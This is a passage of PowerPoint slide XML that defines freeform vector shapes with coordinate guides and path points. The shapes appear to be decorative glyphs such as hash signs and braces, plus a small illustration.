                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>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2" name="Freeform 139"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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Freeform 140"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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Freeform 141"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="4023"/>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Freeform 142"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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Freeform 143"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563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7" name="Freeform 144"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828"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8" name="Freeform 145"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 146"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172"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Freeform 147"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="4027"/>
                <a:ext cx="189" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 62 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 122 w 189"/>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20">
                    <a:moveTo>
                      <a:pt x="189" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 148"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6574"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Freeform 149"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769"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Freeform 150"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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4" name="Freeform 151"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114"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Freeform 152"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312"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Freeform 153"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="4027"/>
                <a:ext cx="76" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 21 w 63"/>
                  <a:gd name="T3" fmla="*/ 199 h 241"/>
                  <a:gd name="T4" fmla="*/ 21 w 63"/>
                  <a:gd name="T5" fmla="*/ 158 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 129 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 113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7 w 63"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 224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1"/>
                      <a:pt x="21" y="227"/>
                      <a:pt x="21" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="139"/>
                      <a:pt x="14" y="130"/>
                      <a:pt x="0" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="1"/>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7"/>
                      <a:pt x="42" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="213"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="224"/>
                      <a:pt x="63" y="224"/>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Freeform 154"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="4027"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 129 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 158 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 199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9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="130"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="41" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="227"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="224"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="213"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="137"/>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8" y="112"/>
                      <a:pt x="63" y="113"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="63"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Freeform 155"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669"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Freeform 156"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="401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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="171"/>
                      <a:pt x="174" y="172"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="187"/>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199"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="81" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54"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5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>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80"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="7" y="192"/>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0"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>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3"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="139"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4" y="160"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>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2" y="189"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="67"/>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2"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="38" y="140"/>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7"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117"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8"/>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7"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4"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>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2"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="39"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>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1" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
